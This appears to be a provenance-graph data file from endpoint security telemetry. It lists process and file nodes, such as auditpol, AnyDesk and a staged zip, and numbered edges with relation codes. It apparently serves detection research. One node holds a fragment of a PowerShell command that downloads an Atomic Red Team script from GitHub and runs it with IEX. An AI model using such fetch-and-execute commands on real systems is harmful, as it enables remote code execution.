12
MP*-p2602380.exe
MF-\d2xc185.vb
MP*-OUTLOOK.EXE 
MF-Files\AnyDesk\AnyDesk.exe
TP*-auditpol.exe
MF-TEMP\Folder_to_zip.zip
MF-C:\Users\admin\AppData\Local\Temp\msetup\operasetup
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX
MP*-MicrosoftEdgeUpdate.exe
MP-ns967A.tmp 
TF-network.m
MP-ns9423.tmp 
32
0 1 RD-1
0 2 FR-1
2 1 WR-2
0 3 RD-1
2 3 EX-2
0 4 IJ-1
4 1 WR-3
2 4 IJ-2
4 3 EX-3
0 5 RD-1
2 5 RD-2
4 5 RD-3
0 6 RD-1
2 6 EX-2
4 6 UK-3
0 7 ST-1
7 2 RF-1
0 8 FR-1
8 1 WR-4
8 3 EX-4
8 5 WR-4
8 7 ST-4
0 9 FR-1
9 1 RD-4
2 9 UK-2
0 10 EX-1
8 10 WR-4
11 1 WR-4
11 3 WR-4
11 5 EX-4
7 11 RF-4
8 11 UK-4

